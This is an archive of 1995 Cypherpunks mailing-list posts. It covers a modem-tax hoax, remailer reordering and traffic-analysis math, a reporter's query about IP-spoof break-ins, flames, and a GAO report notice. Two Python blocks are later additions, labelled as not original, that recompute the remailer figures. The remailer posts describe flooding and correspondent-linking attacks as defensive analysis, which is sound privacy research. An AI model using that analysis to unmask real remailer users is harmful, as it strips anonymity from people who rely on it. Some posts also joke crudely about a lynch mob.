[        (3) investment to be written off rapidly
[
[  Buying into this vision upholds the honor of
[  our forefathers, fights big government, empowers
[  the  individual, and ushers in the American
[  millennium.
[
[  Simple, succinct...and packed full of lies.
[
[  My only question is: why did the document have to
[  be so long?
[
[ -rkm
[


-----------------------------------------------------
[End of MC Analysis (2/2)]



---

Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 25 Jan 95 10:58:19 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Subject: Re: data charge
In-Reply-To: <v01510102ab4c13015e0e@[152.97.12.101]>
Message-ID: <199501251857.NAA17936@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	If you believe this, there is a boy dying of cancer who wants
to be in the Guinness book of world records for getting the most dollar
bills in the mail.  It's cheaper than a get well card, and besides,
they abolished the get-well card category after Craig Shergold.

	So, mail your dollar to:

	Adam Shostack
	92 Howard St
	Cambridge Ma, 02139

	And help make someone very happy.  :)

	Also, save a copy of this message.  Any time you see something
about a modem tax, post this message in response.  It's a better use of
your stamps.  Really.



| >Two years ago the FCC tried and (with your help and letters of
| >protest) failed to institute regulations that would impose
| >additional costs on modem users for data communications. Now,
| >they are at it again. A new regulation that the FCC is quietly
| >working on will directly affect you as the user of a computer and
| >modem. The FCC proposes that users of modems should pay extra
| >charges for use of the public telephone network which carry their
| >data. In addition, computer network services such as CompuServ,
| >Tymnet, & Telenet would also be charged as much as $6.00 per hour
| >per user for use of the public telephone network. These charges
| >would very likely be passed on to the subscribers. The money is
| >to be collected and given to the telephone company in an effort
| >to raise funds lost to deregulation.  Jim Eason of KGO newstalk
| >radio (San Francisco, CA) commented on the proposal during his
| >afternoon radio program during which, he said he learned of the
| >new regulation in an article in the New York Times. Jim took the
| >time to gather addresses which are given below.

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 25 Jan 95 13:59:01 PST
To: cypherpunks@toad.com
Subject: Remailer
Message-ID: <199501252158.NAA12786@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Louis Cypher (alt.anonymous.messages)

In this message I will analyze message reordering in remailers, and
traffic analysis in remailer webs.

Remailers which immediately resend incoming messages provide no 
security against an attacker who is able to watch all traffic to and 
from the remailer.  Two proposals have been suggested to solve this 
problem, latency and reordering.  In recent discussions, the consensus 
was that message reordering was superior to (and the actual intent of) 
latency.  Reordering is not sufficient; a form of latency is required 
to make it effective.

In this analysis, I assume that the reordering is accomplished by 
keeping a group of n messages at the remailer, and sending a random 
one whenever a new message comes. This is superior to simply waiting 
for n messages to arrive, then sending them all at once (I will show 
this later).

The attack on the reordering remailer is simple. The attacker sends a 
stream of marked messages through the remailer.  After the waiting 
messages have been flushed out, any incoming real message will be 
flushed out of the remailer before more arrive, allowing it to be 
uniquely identified coming and going.  The defense against this is to 
only check the group and send excess messages after a time delay. This 
delay should be the typical time for n real messages to arrive. A 
mixing of approximately n messages is ensured by this process. If 
there is no attack, then the mixing is not quite as good as keeping a 
group of 2n messages.

Here is the math on the reordering schemes:

1) Wait for n messages, then mix and send them all.
	The message is known to be one of those 10 (duh).

2) Keep a group of n messages. Send one of the n+1 when a new one 
	arrives.
	The message could be any message ever sent after arrival.
	That is not useful. How many messages does it take before we are
	90% sure that the message has been sent?

Prob that the message has not been sent after x messages is (n/(n+1))^x

Prob that it has been sent = 1 - (n/(n+1))^x
Messages till 90% prob:  x = ln(.1)/ln(n/(n+1))
For n=10, x=24, which is much better than 10 for scheme 1.

3) Accumulate b messages, then send a of them (Scheme 2 is a=1, b=n)
  x = ln(.1)/(ln(a) - ln(b))
  This gives the largest x  for a=1.
  In my example of how to defend against the flood attack, a=n, b=2n
  x = 33
  This is misleading, because it will introduce twice the delay as 
  scheme 2.
  Given the same delay, a=n/2, b=n, one finds that x=16.6
  That is better than batching, but not as good as scheme 2. The
  smaller x is worth it, because a reordering of at least some minimum
  number of messages is ensured.

Some writer proposed changing n randomly to protect against this 
attack. Obviously that would not work. The attack will consist of many 
many more than n messages.

The second issue for consideration is:
Given a web of perfect remailers, how easy is it to identify 
correspondents? Tim has been asking this one for a while.

I assume that there is sufficient traffic through all remailers that 
any message entering the web could be any message leaving the web. 
This can be achieved, even with light traffic, by sending fake 
messages through the web to bit buckets. While they do not improve the 
security of the web as a whole, they help ensure that no tracking of 
messages within the web is possible, forcing it to be treated as a 
black box.
I assume that no correspondents are remailers themselves, and that all 
communications are random (random times with random people). This 
assumption that all communications are uniformly distributed is 
terrible but....
This analysis only applies to indistinguishable messages. Each 
standard packet size can be thought of as having its own black box (a 
good argument for message splitting and having only one packet size).

To simplify the problem, I am going to treat the web as though it were 
clock driven. Some number of messages enter and leave the web each 
"tick" with no messages staying in the web between ticks.  This is a 
reasonable approximation, with the "tick" being the mean time of 
passage through the web.

Define "f" as the fraction of the remailer-using population sending a 
message in a given tick. This is also the probability that any 
individual will send a message in a given tick. The probability of a 
given pair of correspondents in a given tick is
	f^2
The probability of a pair of correspondents occurring m times in n 
ticks is
        m
p= 1 - Sum [(f^2)^i (1 - f^2)^(n-i) n! / (i! (n-i)!)]
       i=0

Let's put some numbers in there. If people send 1 message per day on 
average, and one tick is 30 min., then f=1/48. If you watch the web 
for a month you will see 1440 ticks. If the chance probability of your 
sending m messages to your co-conspirator  is too small then you have 
been nabbed.
The condition for that is: p << (1/population)

The results for m=0 to 12 (using the above numbers) are:

m = 0   	p = 4.64811E-1
m = 1   	p = 1.30173E-1
m = 2   	p = 2.56257E-2
m = 3   	p = 3.86587E-3
m = 4   	p = 4.71498E-4
m = 5   	p = 4.81967E-5
m = 6   	p = 4.23687E-6
m = 7   	p = 3.26538E-7
m = 8   	p = 2.23961E-8
m = 9   	p = 1.38336E-9
m = 10  	p = 7.77044E-11
m = 11  	p = 4.00273E-12
m = 12  	p = 1.91774E-13

So, for a remailer using population of 10,000 you had better send less 
than 5 messages per month to your accomplice.  This only gets worse 
the longer you keep it up. You can not send 4 per month, month after 
month.

		Louis Cypher

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
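
[The figures in the message above, recomputed as an added example that is
not part of the original post: the 90% delay for each reordering scheme,
a Monte Carlo check of scheme 2, and the chance-coincidence table with
its 1/population test. Function names are hypothetical; each flush is
assumed to retain a message with probability (b-a)/b (scheme 2 taken as
a=1 out of the n+1 held at send time), and a plain "<" stands in for the
post's "p << 1/population".]

```python
import math
import random


def messages_until(conf, a, b):
    """Arrivals needed before a held message has left with probability conf.

    Assumed model: each flush sends a of the b held messages at random, so a
    message survives one flush with probability (b - a) / b, and a new
    arrivals are needed to trigger the next flush.
    """
    rounds = math.log(1.0 - conf) / math.log((b - a) / b)
    return rounds * a


def simulate_pool(n, x, trials=20000, seed=1995):
    """Monte Carlo check of scheme 2: fraction of tagged messages that have
    left a pool of n within x arrivals (the tagged arrival counts as one)."""
    rng = random.Random(seed)
    left = 0
    for _ in range(trials):
        pool = ["cover"] * n + ["tagged"]      # tagged message just arrived
        for _ in range(x):
            if pool.pop(rng.randrange(len(pool))) == "tagged":
                left += 1
                break
            pool.append("cover")               # next arrival refills the pool
    return left / trials


def chance_tail(m, f, ticks):
    """P(a given pair both send in more than m of `ticks` ticks by chance).

    Binomial upper tail with per-tick probability f^2, summed directly so
    that small tails are not lost to cancellation in 1 - sum.
    """
    q = f * f
    pmf = (1.0 - q) ** ticks                   # P(exactly 0 coincidences)
    ratio = q / (1.0 - q)
    tail = 0.0
    for i in range(ticks):
        pmf *= (ticks - i) / (i + 1) * ratio   # now P(exactly i + 1)
        if i + 1 > m:
            tail += pmf
    return tail


def first_m_below(population, f, ticks):
    """Smallest m whose chance probability falls below 1/population.
    Plain '<' replaces the post's 'p << 1/population' (a simplification)."""
    m = 0
    while chance_tail(m, f, ticks) >= 1.0 / population:
        m += 1
    return m


if __name__ == "__main__":
    n = 10
    print("scheme 2, a=1 of n+1 :", round(messages_until(0.9, 1, n + 1), 2))
    print("timed flush, a=n, b=2n:", round(messages_until(0.9, n, 2 * n), 2))
    print("same delay, a=n/2, b=n:", round(messages_until(0.9, n // 2, n), 2))
    print("simulated P(left within 24):", simulate_pool(n, 24))
    f, ticks = 1 / 48, 1440                    # the post's numbers
    for m in range(13):
        print(f"m = {m:<2}  p = {chance_tail(m, f, ticks):.5E}")
    print("first m below 1/10000:", first_m_below(10000, f, ticks))
```
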




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sorr@eznet.net
Date: Wed, 25 Jan 95 11:21:14 PST
To: cypherpunks@toad.com
Subject: Identity
Message-ID: <199501251909.OAA26291@roch0.eznet.net>
MIME-Version: 1.0
Content-Type: text/plain


To whomever:
  I'm a reporter at the daily newspapers in Rochester, N.Y., researching a 
story on the recent spate of IP-spoof hack events. Supposedly a toad.com 
address was used by a person who broke into the San Diego supercomputer center 
a month ago. What's toad.com? I got your name from a web search that found an 
old communique.
  Can you be any help? I'm simply trying to reconstruct what happened.
Steve Orr
Gannett Rochester Newspapers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@rahul.net
Date: Wed, 25 Jan 95 14:50:45 PST
To: cypherpunks@toad.com
Subject: Re: Modem Tax!--Write to FCC Commmissioner Craig Shergold
Message-ID: <199501252246.AA05835@bolero.rahul.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Jan 1995, Klaus! von "Aaack Pthoey" Future Prime wrote:

> In a related note, opponents of this modem tax are encouraged to flash
> their headlights at oncoming traffic.

	But, but... I heard that new members of BlackNet have to kill 
a driver who flashes their headlights at them, as part of an initiation 
rite. I know it's true: Klaus! told me so in private e-mail. Is there any 
verification of this? I'm frightened...

CryptNet Franchise 0x6969




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 25 Jan 95 12:08:27 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Subject: Re: In Re: Modem Tax
In-Reply-To: <v01510106ab4c4e7b1d52@[152.97.12.101]>
Message-ID: <9501252008.AA15469@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Rhys Kyraden says:
>         I wanted to oh so thankfully thank all 15 of you who so calmly and
> straightforwardly set me straight on this subject. I must apologize for my
> dire misdeed in presenting this to the list. Maybe you could all form a
> lynch mob, come on down to good ole Tennessee and beat this poor ignorant
> Hillbilly to death, hang him from a tree, and burn a few crosses while you're
> at it.

Aw, shucks. It's nice of you to invite us, but I'm a bit busy this
week. Could I send some friends?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Insomnia Gallumbits)
Date: Wed, 25 Jan 95 12:51:05 PST
To: cypherpunks@toad.com
Subject: Re: CP archives?
Message-ID: <199501252047.PAA06237@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <m0rWvRj-0004JGC@s116.slcslip.indirect.com>,
Ed Carp [khijol Sysadmin] <erc@s116.slcslip.indirect.com> wrote:
>Can anyone tell me where the CP mailing list is archived?  Thanks!

In one form or another, it's all on
ftp://hks.net/cypherpunks/{All,nntp/cypherpunks}.  Unfortunately, it's
quite a mess and is worth much unless 

A somewhat better alternate is NNTP:nntp.hks.net, by which the traffic
since June is all available under hks.lists.cypherpunks.

Getting a decent, web-searchable archive up is near the head of my 2nd
tier queue.
- - --
Todd Masco     | "Let me get this straight.  You're making a crypto toolkit,
cactus@hks.net |  and you're worried about it being _obscure_?" - Eric Hughes
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLya4CyoZzwIn1bdtAQGv7AF/UDQyzn/93X45o341yOCvZNsigZfmVu0b
0BwEHFhHghf4gqjVtLy9spqvLZ+cM4G8
=t6c0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 25 Jan 95 12:49:49 PST
To: cypherpunks@toad.com
Subject: Re: Identity
In-Reply-To: <199501252027.AA15453@bolero.rahul.net>
Message-ID: <9501252049.AA15548@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



nobody@rahul.net says:
> > Gannett Rochester Newspapers
> 
> Fuck Gannett.

My, that's really constructive. Mr. Nobody is concealing his identity for
good reason -- he's got nothing intelligent to say.

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Wed, 25 Jan 95 16:07:32 PST
To: cypherpunks@toad.com
Subject: Re: Magna Carta Analyzed
Message-ID: <199501260008.QAA05396@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



> From:          rkmoore@iol.ie (Richard K. Moore)
> Subject:       Magna Carta Analyzed 

Nice analysis - I'll use it with thanx.

> [  Simple, succinct...and packed full of lies.
> [
> [  My only question is: why did the document have to
> [  be so long?
> [
> [ -rkm
> [

As every priest, mountebank, con artist, lawyer and politician knows, 
lies go down easier with *lots* of arm waving.  Otherwise, we might 
pay attention to the men behind the curtain.

Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Wed, 25 Jan 95 16:10:31 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Doublespeak, Doublethink, Thought Police, and 1984
In-Reply-To: <199501240622.WAA26904@netcom18.netcom.com>
Message-ID: <9501260008.AA26609@doom>
MIME-Version: 1.0
Content-Type: text/plain



> I first read "1984" in around 1966, when I was in the 8th grade, and
> it has stuck with me ever since. No other novel has added as many
> basic linguistic and political ideas to the language as this novel--by
> yet another member of the Eric Conspiracy Secret Laboratories!
> 
> Big Brother, Thought Police, thoughtcrime, doublespeak, doublethink,
> Big Brother is Watching You!, War is Peace, Freedom is Slavery,
> sexcrime, unperson, and probably several other terms I've left
> out. All are part of our language.
> 
> Too bad people on both the left and the right are missing the lesson.
> 
> Any Cypherpunk who hasn't read this novel should run out tonight to
> the All-Nite Barnes and Borders Megastore and buy a copy.

And while you're at it, you might want to take a look at Orwell's
classic essay, "Politics and the English Language."


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 25 Jan 95 13:22:50 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: In Re: Modem Tax
In-Reply-To: <9501252008.AA15469@snark.imsi.com>
Message-ID: <Pine.SOL.3.90.950125161731.13836A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm just up the road.  Can I be of service?


On Wed, 25 Jan 1995, Perry E. Metzger wrote:

> 
> Rhys Kyraden says:
> >         I wanted to oh so thankfully thank all 15 of you who so calmly and
> > straightforwardly set me straight on this subject. I must apologize for my
> > dire misdeed in presenting this to the list. Maybe you could all form a
> > lynch mob, come on down to good ole Tennessee and beat this poor ignorant
> > Hillbilly to death, hang him from a tree, and burn a few crosses while you're
> > at it.
> 
> Aw, shucks. It's nice of you to invite us, but I'm a bit busy this
> week. Could I send some friends?
> 
> Perry
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Wed, 25 Jan 95 08:19:46 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: LOCKSMITH'S GUILD WANTS L
Message-ID: <Pine.3.89.9501251635.A18687-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 25 Jan 1995, Charles Bell wrote:

> how do
> we ensure that those skyscrapers don't fall down on us?  That the surgeon
> who is going to open me up knows something about surgery?  That my money
> is at least somewhat safe in the bank?

With non-government reputation and certification agencies. Currently the
government is saying 'there shall be one certification agency and it shall
be us', whereas personally if I were hiring someone to design a skyscraper
or cut me open I'd much prefer to pick someone who had a good rating from
three or four independent agencies. 

The only difference is that you would have the choice of choosing someone
cheap who didn't have a good reputation, not that we'd give up on them
altogether (see the numerous past discussions of reputations etc on the 
list, and the Cyphernomicon).

> ....once we get past what seems to be your utter refusal to consider
> the possibility that government could ever do anything right ....

Another thing to consider is that the government monopoly has a lot less
to lose by certifying people incorrectly than a commercial agency would.
The government's reputation is low enough already that such errors won't
affect it significantly, whereas a commercial agency would lose a lot of
custom to its competitors. 

		Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Wed, 25 Jan 95 19:14:21 PST
To: cypherpunks@toad.com
Subject: (Fwd) Information Superhighway - GAO Report
Message-ID: <199501260315.TAA07854@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



Old news, I'm sure, but certain to be cited in the legal & regulatory 
debates ...

------- Forwarded Message Follows -------
Date:          Wed, 25 Jan 1995 11:49:42 EST
Reply-to:      gao-docs <gao-docs@MAILHOST.GAO.GOV>
From:          gao-docs <gao-docs@MAILHOST.GAO.GOV>
Subject:       Information Superhighway - GAO Report
To:            Multiple recipients of list PUBPOL-L <PUBPOL-L@UMINN1.BITNET>

                       GAO Report - Information Superhighway

The U.S. General Accounting Office, the Congressional watchdog
agency, has recently released the following report:

  *** ASCII Full Text Access and Ordering Info Follows ***

TITLE:    Information Superhighway: An Overview of Technology Challenges
          RPTNO: AIMD-95-23                  DOCUMENT DATE: 01/23/95

BACKGROUND:
    GAO reviewed the technical issues associated with protecting the
    information superhighway from unauthorized access.
FINDINGS:
    GAO found that: (1) the information superhighway poses technical challenges
    concerning the security, privacy, and reliability of personal and
    proprietary information; (2) a large proportion of the information that
    will traverse the superhighway will be sensitive and a tempting target for
    hackers, foreign governments conducting political and military intelligence
    operations, domestic and foreign enterprises engaged in industrial
    espionage, or terrorist groups seeking to disrupt society or the economy;
    (3) significant effort will be needed to define, develop, test, and
    implement measures to prevent unauthorized access to the superhighway; (4)
    although the federal government could play a leading role in ensuring the
    superhighway's security, critics argue that individuals should be free to
    choose the technical means for meeting their security requirements; (5) a
    major challenge facing the development of the information superhighway will
    be creating a consensus between the federal government, computer and
    communications industry, business community, and civil liberties groups on
    how to ensure information security and privacy; (6) federal and private
    sectors have begun establishing uniform standards to ensure the
    superhighway's interoperability; and (7) questions remain about how to
    protect the superhighway from large network failures and encourage the
    telecommunications industry to develop a secure and reliable
    infrastructure.

***************************************************************

This report is available both in print and electronically.

***************************************************************
[junk deleted]
***************** ELECTRONIC ORDER INFORMATION ****************

To access GAO reports as FULL TEXT ASCII electronic files from
the Government Printing Office (GPO) BBS, follow these steps:

1) TELNET to <federal.bbs.gpo.gov> and designate "port 3001"
   or dial 202-512-1387 (Menu Selection #22 on FEDWORLD);

(***NOTE*** Depending on how your system accesses the TELNET
feature, you may need to TELNET to this address:

                   <federal.bbs.gpo.gov 3001>
                                        ^^^^^
and hit return a few times after connecting.  You should receive
a greeting screen.  If you receive a prompt for "PASSWORD",
something is wrong.  Either re-try or contact GPO at the phone
number below.)

2) Log in or register on system (type: "NEW" if first time user);

3) From the Main Menu, select "File Library System - 6";

4) Select "S - Select Library";

5) Type:  "GAO_RPTS";

6) Select file name: Information Superhighway: AI95023.TXT

*****************************************************************

Any questions on using the GPO system should be referred to GPO
at 202-512-1530.  Please do NOT use this e-mail address for
questions about the GPO system or for ordering reports.

GPO charges a fee to download each file.  Exact costs are listed
on the GPO system.

NOTE: All Federal Depository Libraries are authorized to download
files at no charge.  FDL's must first be registered on the GPO
system in order to be authorized free download access.

****************************************************************

                 PRINTED COPY ORDER INFORMATION

Printed copies via U.S. Mail are also available by calling
202-512-6000 (TDD number is 301-413-0006), sending a FAX to
301-258-4066, or by writing to:

        P.O. Box 6015, Gaithersburg, MD 20884-6015.

Please include the report number and complete postal mailing
information in your request.

Telephone requests can be made 24 hours a day, seven days a week.
During non-business hours, leave a voice mail message with
complete information, including the report number and postal
mailing information.

Copies may also be picked up at the GAO headquarters at:

        700 - 4th St., NW, Washington, DC.

Sorry, we are NOT able to accept electronic orders for printed
documents at this time.

The first printed copy is FREE of charge.  Additional copies are
$2.00.

****************************************************************
[more junk deleted]

Please forward comments and suggestions to:

                       <gao-docs@gao.gov>

Thank you.

***************************************************************
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 25 Jan 95 13:34:51 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Identity
In-Reply-To: <199501252027.AA15453@bolero.rahul.net>
Message-ID: <199501252136.QAA04802@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


someone wrote anonymously:
> Fuck Gannett.

This belongs in private email, assuming that isolated epithets are worth
sharing with anyone outside your primal scream therapy group. 

Are you related to Detweiler, perchance ?

 -L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Wed, 25 Jan 95 16:58:19 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: Remailer
Message-ID: <199501260057.AA15184@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> From: Louis Cypher (alt.anonymous.messages)
> 
> Define "f" as the fraction of remailer using population sending a 
> message in a given tick. This is also the probability that any 
> individual will send a message in a given tick. The probability of a 
> given pair of correspondents in a given tick is
> 	f^2
> The probability of a pair of correspondents occurring m times in n 
> ticks is
>         m
> p= 1 - Sum [(f^2)^i (1 - f^2)^(n-i) n! / (i! (n-i)!)]
>        i=0

Hmm... this sounds very similar to the results of my 
analysis which I posted yesterday (Subject: analysis of Chaum's MIX
continued), which I think is slightly more general.

> Let's put some numbers in there.... [deleted]
> So, for a remailer using population of 10,000 you had better send less 
> than 5 messages per month to your accomplice.  This only gets worse 
> the longer you keep it up. You can not send 4 per month, month after 
> month.

Plugging these numbers into my formula, the "threshold of
traceability" comes out to be 4 messages.  This is probably due to the 
fact that I used a normal approximation for the binomial 
probability (the p in the above formula).

The general conclusion however is the same: unless most 
users send a lot of dummy mail to each other, a Chaum type 
mix will not provide very good untraceability.

The other possible way to increase untraceability is to 
decrease the number of batches per unit time (i.e., 
increase average latency).  This implies that with a 
Chaumian mix, there is an unavoidable tradeoff between 
untraceability, bandwidth (i.e., how much dummy mail has to 
be sent), and latency.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLybywzl0sXKgdnV5AQF0+AP/e5sKTVt5plvGydmILm+cBF14q6IJttDJ
U0Es21jMH0hYPreiRwfUXwMc+bLs/RfTdmGBr0KUPHow0khlzfGHjU8ZKOMknSI/
+qvqHlMRPDfvKnp244qsQUJ1UmLAezeNObO4OMbejWbRRGu+Dd1iEeBpgnFOh0bH
6grf4VupdpU=
=+Um1
-----END PGP SIGNATURE-----
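
The tail probability quoted in the message above and the batching trade-off it ends on, worked through as an added example that is not part of the original posts. The traffic figures (10 messages per user per month; 30, 120 or 720 batches per month; a 1e-6 significance level) and the continuity-corrected normal approximation are assumptions chosen for illustration, since the numbers in the quoted post were deleted.

```python
import math


def _pair_prob(f):
    # f: fraction of the user population sending in one tick (batch).
    # f^2 is the quoted chance that a given pair both show up in the same tick.
    if not 0.0 < f < 1.0:
        raise ValueError("f must be strictly between 0 and 1")
    return f * f


def chance_tail(n, f, m):
    """Exact P(X > m) for X ~ Binomial(n, f^2).

    This equals the quoted p = 1 - Sum_{i=0..m} C(n,i) (f^2)^i (1-f^2)^(n-i),
    but sums the upper tail directly in log space so tiny values keep precision.
    """
    q = _pair_prob(f)
    log_q, log_not_q = math.log(q), math.log1p(-q)
    total = 0.0
    for i in range(m + 1, n + 1):
        log_comb = (math.lgamma(n + 1) - math.lgamma(i + 1)
                    - math.lgamma(n - i + 1))
        total += math.exp(log_comb + i * log_q + (n - i) * log_not_q)
    return total


def chance_tail_normal(n, f, m):
    """Normal approximation to the same tail (continuity correction assumed)."""
    q = _pair_prob(f)
    mu = n * q
    sigma = math.sqrt(n * q * (1.0 - q))
    z = (m + 0.5 - mu) / sigma
    return 0.5 * math.erfc(z / math.sqrt(2.0))


def threshold(n, f, alpha, tail=chance_tail):
    """Smallest m such that more than m chance co-occurrences in n ticks
    has probability below alpha. A pair that co-occurs more often than this
    stands out from background traffic."""
    for m in range(n + 1):
        if tail(n, f, m) < alpha:
            return m
    return n


def batching_tradeoff(msgs_per_user, batch_counts, alpha):
    """For a fixed per-user message rate (real plus dummy traffic), show how
    the number of batches per period moves the threshold.

    Returns rows of (batches, f, exact_threshold, normal_threshold).
    """
    rows = []
    for n in batch_counts:
        f = msgs_per_user / n  # fraction of users present in each batch
        rows.append((n, f,
                     threshold(n, f, alpha, chance_tail),
                     threshold(n, f, alpha, chance_tail_normal)))
    return rows


if __name__ == "__main__":
    # Constructed scenario: 10 messages per user per month, mix flushing
    # daily (30), every six hours (120) or hourly (720).
    print("batches  f        exact  normal")
    for n, f, exact, normal in batching_tradeoff(10, [30, 120, 720], 1e-6):
        print(f"{n:7d}  {f:.5f}  {exact:5d}  {normal:6d}")
```

With these constructed figures the normal approximation puts the threshold lower than the exact binomial tail does, and cutting the batch count from 720 to 30 raises the exact threshold, which is the latency side of the trade-off.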




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Wed, 25 Jan 95 17:03:27 PST
To: sorr@eznet.net
Subject: Re: Sex with the Gannett newspaper chain
Message-ID: <v03001113ab4ca3df3779@[140.174.229.224]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:27 1/25/95, nobody@rahul.net wrote:
>sorr@eznet.net wrote:
>>I'm a reporter at the daily newspapers in Rochester, N.Y., researching a
>> story on the recent spate of IP-spoof hack events....
>
>Fuck Gannett.

Thanks for the deeply intellectual addition to the discussion in progress.
Perhaps you could send Steve Orr a message from a non-anon account
explaining why you think his troll shows he's a clueless newbie, or, even
better, forward some of the research material to him, so we don't wind up
with another sensational, uninformative article.

Oh well, I guess it's each to his ability...

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 25 Jan 95 17:31:04 PST
To: cypherpunks@toad.com
Subject: US News and World Report [Repost]
Message-ID: <Pine.3.89.9501251903.C19918-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
I just looked over an article in US News and World Report today.  The cover
was a badge with the words "Cyber Cops" on it.  Guess which article I
scanned.
 
"Is Anything Safe in Cyberspace?"
 
I think it came over okay.  Quoted Chaum, mentioned the positive uses of
remailers, had extensive sections on privacy and on free speech.  It
was somewhat sympathetic to Clipper, didn't really take the protests
seriously.  Mentioned anonymous ecash.  It also had a quote skewering the
highway metaphor, "It's organic".
 
This was all after the four horsemen were trotted out, in all their glory.
If anyone looked at only the first six inches, it sounded like an attack on
the net as a whole.
 
I'd give it a 4 on an objective scale, 7 compared to what we expect.
 
 
Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.
 
Factors for modulus are not proven primes.  Key may be far weaker than
expected.  Encode at your own risk.
 
Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com>
Key fingerprint =  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLyRiMHmgMs8UcStNAQE0jQf+PoZWpuN5y8mDfpvn7g1eiJs6uHI+7DqM
lS63jgQs5zE4Nfk7yXCyhh9HY7qx8T2P4TvRUBGFGZk74+9ANg54GopBDLWYEwFM
eNgheMg1w/iF6kyrEyPBLS3QaphfjDgknf6ohBv6qx/ZOJ7N10iWW06eu5O/H9Se
YDk6RvUzz7niyknGG1kO3aTqTqQ3tSG21FRktV7gbUeayLCLdhQKD7bowZkClR6Z
KJ2gVvu7dmNczpsMYleZjOD2p9rSsMKoL42rJykbJRwHunJhF8hgaUnq8P7frmea
xJ8YlcrrI+rwY5mNb6ylNR/KLNvV+rd17IZjE/+3xaPEM+s04dy1Rw==
=WAub
-----END PGP SIGNATURE-----





